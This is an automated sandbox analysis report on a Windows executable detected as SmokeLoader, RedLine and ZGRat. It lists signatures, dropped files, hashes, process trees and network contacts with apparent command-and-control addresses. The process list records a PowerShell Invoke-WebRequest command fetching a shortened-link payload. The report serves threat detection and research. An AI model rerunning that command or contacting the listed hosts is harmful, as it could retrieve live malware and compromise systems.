Analysis Overview
SHA256
bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Threat Level: Known bad
The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.
Malicious Activity Summary
ZGRat
SmokeLoader
RedLine
Detect ZGRat V1
Smokeloader family
RedLine payload
Downloads MZ/PE file
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Deletes itself
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:48
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:48
Reported
2023-12-18 21:51
Platform
win7-20231215-en
Max time kernel
27s
Max time network
51s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2804 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
| PID 1196 wrote to memory of 2712 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7946.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\7946.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
Files
memory/1812-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1196-1-0x0000000002D80000-0x0000000002D96000-memory.dmp
memory/1812-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\626B.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2804-14-0x00000000000E0000-0x0000000000132000-memory.dmp
memory/2804-19-0x0000000074C20000-0x000000007530E000-memory.dmp
memory/2804-20-0x0000000005060000-0x00000000050A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7946.exe
| MD5 | 2a28b9b387ac57fc29a0457bf3db1362 |
| SHA1 | aab48e37c9ebf46044bb20166024391c2b4a460d |
| SHA256 | 12e8ef352e9fa063e140335978079015b61097b9079713ba016731a03cfd8265 |
| SHA512 | 6aeef83b77a5ad3cf676a4156dadd4a8852dec0ced3d6d77d8273d073ef36884648c90e26c7b47ba8d90336956b7b4b1c8f8aa80c32440d6daf61266fa52b50a |
C:\Users\Admin\AppData\Local\Temp\7946.exe
| MD5 | 1e6201dd037dfef6161454cd3f86a3d3 |
| SHA1 | cbd0e2d34f16c16c481eb35c67c05ce86a37cf2a |
| SHA256 | a9ba17c3daeac7e6a1436e1a8cdbc6c8025cd31101eb37c14366265f75dfbf97 |
| SHA512 | 72a5144a0e44e97a88eccb04b3404a0326c5e9afd49ca047a734cd1822185c0328e2337751c5bb773f24de9e00213121b5fc21f750cf1628277e161c595b219a |
memory/2712-28-0x0000000074C20000-0x000000007530E000-memory.dmp
memory/2712-29-0x0000000001090000-0x0000000001E82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 067c86cb45aeebf8bbbaae4c59001c95 |
| SHA1 | bc87b3d328c2d8de9f68f691162c0a33a6edeefa |
| SHA256 | a10235f3f3a54383ce20a4be44e0ef3c68ac2667f7de867bcf893193a0fa9d8b |
| SHA512 | 3c92f7ab8ee34d1e268967314fb54c735d640f3a9cdabc551c26640eb83037bb1a341e58c2ce7151ad67b29ddb908a0b968ed20d164ac306b17f4dcbf58110cc |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 85127d5a4730180695b55de64e1ab99a |
| SHA1 | c825af71b3e8a9ea67c6652045e98e56367ee3e4 |
| SHA256 | 9a42c38b9fc5420639f8096f852bdbb163564beae220674d60f00a62e990c087 |
| SHA512 | f88bcb6d89c522e9d6c12b01a5e426943519b895632cca5a17085a01335759cbabc65c4871a6f0008a71999fed9a3598818ea3b8fac174f9b058717a3fdc122c |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 7b1763e38d5b7e23538811ff3d1cd671 |
| SHA1 | e27d43d575e624471f11854c5b15f3c6f7dd64b8 |
| SHA256 | 21ab427f558875ea74978376bb928264c0311653da38ab337840646b522be1f1 |
| SHA512 | 0c0dfa864ee8e303fba29ddfb124b1eb60f21ed8313e1ca6d3b876707713aeb2e3dec585a3d47a73dc3da70ad1a269ce6922be2db7a429d791e36df8e77033e0 |
\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | acf327299a2aad2e54ba6e45989487d4 |
| SHA1 | d0e1087c397c9af16320e879f0645964d9e25062 |
| SHA256 | 73a74e97851389410284c7f828f7a565a8c0590174aad3fb952e8d6101a94d33 |
| SHA512 | 0dd9a4566d7b04af861a777a2cf861e966b036e7a619747f19585e77e02286d2cf4c1013b4f560bed6e325e858ac5944f494fb51243be8d207a2d665eefe700a |
memory/2788-64-0x00000000026A0000-0x0000000002A98000-memory.dmp
memory/2700-70-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | c112a959eabad02c143c62e260a3e7db |
| SHA1 | 73c14926ad2af8d845a6dd2714b23077484f4a53 |
| SHA256 | 0dd421582cbe5f7a10df8f2b301cd9e46cdc4398b8d56152f64ac7e609db150c |
| SHA512 | 711359606ecea6f9549d33dbe0490c50c973f3301dcba3bcdac28ab4ca8506d887876d5f0612b1bc1342a34e32c05d1553504373bbc03eb7e375f979f2d99b49 |
memory/2712-71-0x0000000074C20000-0x000000007530E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 25eb9810ecb4b9f78a98460bd20dc79a |
| SHA1 | 777c39afebb2406a86168cf1ffd9b8fa9615f10f |
| SHA256 | fdc4591f89adde93849d4342c79310e88395a80ac7cc6413c81544b4bfd5c386 |
| SHA512 | 943b340c078eb0ed197490197512e4403e15a7d845917eff94ae3c08e9712c485ffff5da3e9c8da53aaad5e167b4d7f02a734b32eef6a70105e23c564407c933 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | ae13a10a632e150700966a92136cede5 |
| SHA1 | 965320472f1277268babbe0289d57f5ac5f90ae1 |
| SHA256 | f8cb57d54fcf63c38d1c07b0370a37f61d0000081d85e71a1ef04eb474769a4a |
| SHA512 | b7479368e3a657a8f2955a86653657ddb4fd99b13f04b0a0a05f3677d6c7cf3b7050821c25930460459acb7a811aeda3da221b45b0c0d65e69095e0bd6638992 |
\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 1564410c4dea562e8b73937a04f8820a |
| SHA1 | 979667abf02c267a65f9ee9344bd8d95b3df5d50 |
| SHA256 | 9c793220c4db689907b222d6be4cbfb935883cf2a4f8695ef2b5a53d8aa464d1 |
| SHA512 | 49eb1fdd6c13e5558ab701365d2a1d5fefcbb1ca55f9efad9245b04cd708514a324e0d785c0f1a9fac971783b417f5c9a08ef6d9758da7a3dd126e287547c242 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | bacc9bd9fb970d8ef3334b48eb786c7c |
| SHA1 | 029a0381e6fd71a55a8a0cc5c75827be978ede3f |
| SHA256 | 2dc25c88e27d0c704998ef4d5006e5b064b4b882b613a346f4753f603e9ef0a9 |
| SHA512 | 7938927ee1667a6647472038fac7008da7509885f1ca2538bd6372fff78fffd738e1c3db31642a7b344148850b8bb1c180e959df1d28deac779dc3028d3024ca |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 182b623fb81bf7cab8127fd7ee0f75d1 |
| SHA1 | a0c0bc47b160a5ab85c38bdc6a46e367ba838c83 |
| SHA256 | e9d707c95e72d9a0213286b18c66cc9fe915f7d4819440398dab84499462e27e |
| SHA512 | c1833ba75f33c3d0adb95b728d10e3752aac9790b278b146d8048414be751b126c428dbdce70f94c9f4899b8a5208c16340a87531124d1e06d84aa935bf0108a |
memory/2788-83-0x00000000026A0000-0x0000000002A98000-memory.dmp
memory/2236-84-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2732-85-0x0000000000CB0000-0x0000000000DB0000-memory.dmp
memory/2732-87-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2236-88-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2788-90-0x0000000002AA0000-0x000000000338B000-memory.dmp
memory/2788-91-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2236-92-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2012-93-0x00000000001D0000-0x00000000001D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | aff4b824cee79c2a6e55cc23fa62b7cc |
| SHA1 | 9fc189c3dc19e12278288ac435236c2c2534960a |
| SHA256 | a6906d2823fe84fe9852db9d6d9822e1a66ce7ad6e0c4c21f5ddbf3737875c5a |
| SHA512 | f6afa76d950e6aa9250ae5ed068888efbf1b928e937f64cb84224e49c1d7bf0981503e40a4faa049e56ff828ea563637e2c0217fceb8bc59e23c7ba2584e7011 |
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 3f52c37d3eeee223c98484192fbc6700 |
| SHA1 | 8492d3bc3b903497e237fcdd27c255782dd0767d |
| SHA256 | a5e37010e39b8b1ada241866be51cef4b78b2cc45108c72faa7a564f58ca7d02 |
| SHA512 | 49adb7dc7a5b798108ba6f36d6a9ed513ed9880338f801a2cda68a425d28f3df9df9eb22fe5db651e7c768b4571d6f7aaca00d46f3c2c986cf9bddee3e79cc82 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 12f835c3e1d78e0a86b1bb86a72e0d8c |
| SHA1 | 2964ca931f3b7ce8d10049ff67b08b86cfb90d85 |
| SHA256 | 36509f0bc5c49702367ce0c4df90ba868ed60b11198eee96e4ecc4c911412907 |
| SHA512 | 34a796add7f3fce8bde807f51a53a8421c35602fdfea9dca1d936e93bed742ad477d3697f8c559494724ec9bbf03014e4bdec62739b6fc10f3ca5ab0d257ee9b |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:48
Reported
2023-12-18 21:51
Platform
win10v2004-20231215-en
Max time kernel
46s
Max time network
85s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F63.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3092 set thread context of 3476 | N/A | C:\Users\Admin\AppData\Local\Temp\67CE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\4F63.exe
C:\Users\Admin\AppData\Local\Temp\4F63.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Users\Admin\AppData\Local\Temp\67CE.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\96EE.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\A680.exe
C:\Users\Admin\AppData\Local\Temp\A680.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.25.253:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.25.5.3.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
Files
memory/3632-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3480-1-0x0000000003150000-0x0000000003166000-memory.dmp
memory/3632-3-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4F63.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/4472-12-0x00000000005D0000-0x0000000000622000-memory.dmp
memory/4472-17-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4472-18-0x0000000005320000-0x00000000058C4000-memory.dmp
memory/4472-19-0x0000000004D70000-0x0000000004E02000-memory.dmp
memory/4472-20-0x0000000004FB0000-0x0000000004FC0000-memory.dmp
memory/4472-21-0x0000000004D50000-0x0000000004D5A000-memory.dmp
memory/4472-22-0x0000000006340000-0x0000000006958000-memory.dmp
memory/4472-24-0x0000000007BC0000-0x0000000007CCA000-memory.dmp
memory/4472-25-0x0000000006180000-0x0000000006192000-memory.dmp
memory/4472-26-0x0000000006260000-0x000000000629C000-memory.dmp
memory/4472-27-0x00000000062F0000-0x000000000633C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\67CE.exe
| MD5 | 964f43d4a3dd18ce2383d19b8fa97975 |
| SHA1 | 0c431ade1a3cbcf5dd31c3d50c28ee6e90936cb8 |
| SHA256 | bf0eaeffee9226451e26c87fc151c6355a67bf0dabb04a243bddd58b00714cb3 |
| SHA512 | 7a0a7d489908eace7cc22b4705308be59fef6d6a1b95e64d34bee1b4b8851867abc0ffd3b43db3a33e1733f581f712cd779db38503719ab3d0c03668ed0ddb1f |
C:\Users\Admin\AppData\Local\Temp\67CE.exe
